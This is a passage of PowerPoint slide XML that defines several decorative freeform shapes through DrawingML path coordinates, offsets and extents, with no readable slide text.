                <a:lnTo>
                  <a:pt x="2865523" y="237645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2853549" y="281175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2838453" y="323319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2820368" y="363943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2799427" y="402914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775765" y="440098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2749514" y="475363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2720808" y="508573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2689780" y="539596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2656564" y="568299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621293" y="594547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2584101" y="618207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2545122" y="639146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2504487" y="657230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2462333" y="672325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2418790" y="684298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2373994" y="693016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2328077" y="698345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2281173" y="700151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="700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129280" cy="890905"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3129280" h="890905">
                <a:moveTo>
                  <a:pt x="3122626" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3123307" y="4517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3127582" y="51915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3129025" y="100075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3127582" y="148235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3123307" y="195632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3116284" y="242183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3106595" y="287806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3094323" y="332417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3079551" y="375934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3062361" y="418275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3042837" y="459356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3021061" y="499095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2997116" y="537410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2971085" y="574217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2943051" y="609434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2913097" y="642979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2881304" y="674768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2847757" y="704718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2812537" y="732748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775729" y="758775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2737414" y="782715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2697675" y="804486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2656595" y="824005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2614258" y="841191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2570745" y="855959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2526139" y="868227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2480525" y="877913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2433983" y="884934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2386597" y="889208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2338450" y="890651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="89055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386454" cy="1081405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3386454" h="1081405">
                <a:moveTo>
                  <a:pt x="3381054" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3381709" y="5472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3385069" y="52419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3386200" y="99949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3385069" y="147489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3381709" y="194446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3376171" y="240767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3368508" y="286401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3358771" y="331298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3347010" y="375404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3333278" y="418670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3317626" y="461043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3300105" y="502473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3280766" y="542907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3259662" y="582295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3236843" y="620585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3212361" y="657725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3186268" y="693665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3158614" y="728352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3129451" y="761736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098831" y="793765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066805" y="824388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3033424" y="853553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2998740" y="881209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2962805" y="907304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2925669" y="931788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887384" y="954608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2848002" y="975713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807573" y="995052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2766150" y="1012574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2723783" y="1028227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2680525" y="1041960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2636426" y="1053720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2591538" y="1063458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2545913" y="1071121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2499601" y="1076659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2452655" y="1080019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2405125" y="1081151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1081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3634104" cy="1281430"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3634104" h="1281430">
                <a:moveTo>
                  <a:pt x="3629109" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3629951" y="8288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3632869" y="56282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3633850" y="104775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3632869" y="153267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3629951" y="201261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3625133" y="248717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3618454" y="295599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3609951" y="341867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3599662" y="387485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3587626" y="432414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3573879" y="476617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3558460" y="520056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3541406" y="562693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3522756" y="604490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3502547" y="645409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3480817" y="685413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3457604" y="724463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3432946" y="762522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3406880" y="799552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3379445" y="835515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3350677" y="870373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3320616" y="904089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289299" y="936625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3256764" y="967942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3223048" y="998003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3188190" y="1026770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152227" y="1054205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3115197" y="1080271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3077138" y="1104929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038087" y="1128142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2998084" y="1149872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2957165" y="1170081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2915368" y="1188731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2872731" y="1205785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2829292" y="1221204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2785089" y="1234951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2740160" y="1246988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2694542" y="1257276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2648273" y="1265779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2601392" y="1272458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2553936" y="1277276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2505942" y="1280194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2457449" y="1281176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12811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3891279" cy="1471930"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3891279" h="1471930">
                <a:moveTo>
                  <a:pt x="3886941" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3887737" y="9218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3890199" y="56789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3891025" y="104775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3890199" y="152760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3887737" y="200331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3883667" y="247459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3878016" y="294118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3870811" y="340280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3862079" y="385919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3851848" y="431007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3840144" y="475517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3826995" y="519423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3812428" y="562696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3796469" y="605310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3779146" y="647237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760486" y="688451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3740516" y="728925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3719264" y="768631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3696756" y="807542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3673019" y="845632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3648081" y="882872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3621969" y="919237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3594709" y="954698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3566329" y="989229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3536857" y="1022802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3506318" y="1055391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3474741" y="1086968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3442152" y="1117507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3408579" y="1146980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3374048" y="1175359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3338587" y="1202619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3302222" y="1228731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3264982" y="1253669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3226892" y="1277406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3187981" y="1299914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3148275" y="1321167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3107801" y="1341136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066587" y="1359796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3024659" y="1377119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2982046" y="1393078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2938772" y="1407645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2894867" y="1420795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2850357" y="1432498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2805269" y="1442730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2759630" y="1451461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2713468" y="1458666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2666809" y="1464317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619681" y="1468387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2572110" y="1470849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2524124" y="1471676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14716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819150" y="1905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81075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1430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819150" y="21526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81075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430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819150" y="24003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81075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6477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11430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819150" y="26479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7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7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981075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430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19150" y="28479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81075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430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819150" y="30956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81075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477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1430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819150" y="33432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81075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Freeform 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477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Freeform 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11430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819150" y="359092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Freeform 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075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Freeform 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5434076"/>
            <a:ext cx="1595755" cy="1424305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1595755" h="1424304">
                <a:moveTo>
                  <a:pt x="0" y="68764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="74873" y="44755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119524" y="33095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164835" y="23131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210772" y="14899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257297" y="8434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304375" y="3772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351971" y="949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448128" y="949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495724" y="3772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542803" y="8434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589329" y="14899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635266" y="23131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680579" y="33095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725231" y="44755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="769187" y="58074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="812412" y="73018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854869" y="89551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896523" y="107637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937338" y="127241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977279" y="148326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1016309" y="170857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1054393" y="194798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1091495" y="220114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127580" y="246768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162612" y="274726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196555" y="303951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1229373" y="334408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261030" y="366062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1291492" y="398875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1320722" y="432813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1348684" y="467840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1375343" y="503921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400664" y="541019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1424609" y="579099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447144" y="618125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1468233" y="658061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1487840" y="698872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1505930" y="740523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1522466" y="782977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1537413" y="826198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1550736" y="870152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1562398" y="914802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1572364" y="960112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580598" y="1006047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1587064" y="1052572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591727" y="1099650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594551" y="1147246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595501" y="1195324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594551" y="1243402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591727" y="1290998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1587064" y="1338076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580598" y="1384601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1573550" y="1423921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Freeform 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697382" y="5293105"/>
            <a:ext cx="439420" cy="388620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="439419" h="388620">
                <a:moveTo>
                  <a:pt x="233273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="373849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438924" y="388023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233273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219075" y="584835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219075" y="599122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219075" y="6181725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219075" y="6324600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219075" y="651510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Freeform 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="665797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Freeform 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10839450" y="5362575"/>
            <a:ext cx="1352550" cy="1495425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1352550" h="1495425">
                <a:moveTo>
                  <a:pt x="1262126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1213710" y="914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1165756" y="3637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118296" y="8134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1071362" y="14374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024988" y="22322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979206" y="31948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="934048" y="43216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="889548" y="56096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845738" y="70554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="802650" y="86557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760317" y="104072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718773" y="123068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678049" y="143510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638179" y="165366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="599195" y="188603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561129" y="213188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524014" y="239089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487884" y="266273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452771" y="294707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418706" y="324359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385724" y="355194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353856" y="387181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323136" y="420287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293596" y="454479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265269" y="489724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238187" y="525989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212383" y="563242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187890" y="601450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164740" y="640580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142967" y="680598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122602" y="721473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103678" y="763172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86229" y="805661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70287" y="848908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55883" y="892880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43052" y="937545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31826" y="982869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22238" y="1028819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14319" y="1075364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8103" y="1122469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623" y="1170103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="906" y="1218489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1266825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="911" y="1315416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623" y="1363546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8103" y="1411180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14319" y="1458285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20637" y="1495422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537225" y="1495422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525739" y="1455015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515722" y="1409344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508457" y="1362696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504033" y="1315160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502539" y="1266825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504033" y="1218489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508457" y="1170953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515722" y="1124305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525739" y="1078634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538418" y="1034032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553671" y="990586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571408" y="948387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="591541" y="907524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613981" y="868087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638639" y="830164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665425" y="793847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="694250" y="759224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725027" y="726384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757665" y="695418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792075" y="666414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828169" y="639463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865858" y="614653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="905052" y="592075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945663" y="571818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987601" y="553972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1030778" y="538625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075104" y="525868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120491" y="515790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1166850" y="508481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214091" y="504029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1262126" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="502526"/>
